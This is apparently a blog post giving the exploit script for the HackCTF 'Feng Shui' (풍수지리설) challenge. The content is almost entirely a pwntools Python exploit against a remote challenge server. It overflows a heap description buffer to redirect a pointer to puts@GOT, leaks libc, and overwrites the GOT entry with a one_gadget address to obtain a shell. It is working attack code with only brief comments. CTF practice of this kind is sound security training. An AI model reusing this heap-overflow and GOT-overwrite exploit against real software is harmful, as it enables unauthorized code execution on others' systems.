[hack ctf] 풍수지리설 (Feng Shui) analysis materials
sangjuns
·2021. 4. 16. 12:41
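```python
from pwn import *

dns, port = "ctf.j0n9hyun.xyz", 3028
p = remote(dns, port)
# p = process("./fengshui", env={"LD_PRELOAD": "./libc.so.6"})
e = ELF("./fengshui")
libc = ELF("./libc.so.6")


# Menu option 0: add an entry (description size, name, text length, text).
def add(des_size, name, txt_size, txt):
    p.sendlineafter(b"Choice: ", b"0")
    p.sendlineafter(b"Size of description: ", str(des_size).encode())
    p.sendlineafter(b"Name: ", name)
    p.sendlineafter(b"Text length: ", str(txt_size).encode())
    p.sendlineafter(b"Text: ", txt)


# Menu option 1: delete the entry at idx.
def delete(idx):
    p.sendlineafter(b"Choice: ", b"1")
    p.sendlineafter(b"Index: ", str(idx).encode())


# Menu option 2: print the entry at idx, including its description.
def display(idx):
    p.sendlineafter(b"Choice: ", b"2")
    p.sendlineafter(b"Index: ", str(idx).encode())


# Menu option 3: rewrite the description of the entry at idx.
def update_des(idx, txt_size, txt):
    p.sendlineafter(b"Choice: ", b"3")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Text length: ", str(txt_size).encode())
    p.sendlineafter(b"Text: ", txt)


# Three entries, then free the first so its chunks can be reused.
add(0x20, b"AAAA", 8, b"AAAA")
add(0x20, b"AAAA", 8, b"AAAA")
add(0x20, b"AAAA", 8, b"AAAA")
delete(0)

# The text is longer than the 0x80-byte description it is written into.
# The filler and chunk-header values carry the write as far as entry 1,
# where the final p32 replaces the description pointer with puts@GOT.
payload = b"A" * 0x80 + p32(0x88) + p32(0x20 + 0x8)
payload += b"A" * 0x20 + p32(0) + p32(0x89) + p32(e.got['puts'])
add(0x80, b"AAAA", len(payload), payload)

# display(1) now prints the bytes at puts@GOT: the resolved puts address.
display(1)
p.recvuntil(b"Description: ")
puts_addr = u32(p.recv(4))
base = puts_addr - libc.symbols['puts']
one_gadget = base + 0x3ac5c  # one_gadget offset in the supplied libc.so.6

# Entry 1's description still points at puts@GOT, so this overwrites it.
update_des(1, 4, p32(one_gadget))
p.interactive()
```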
Exploit code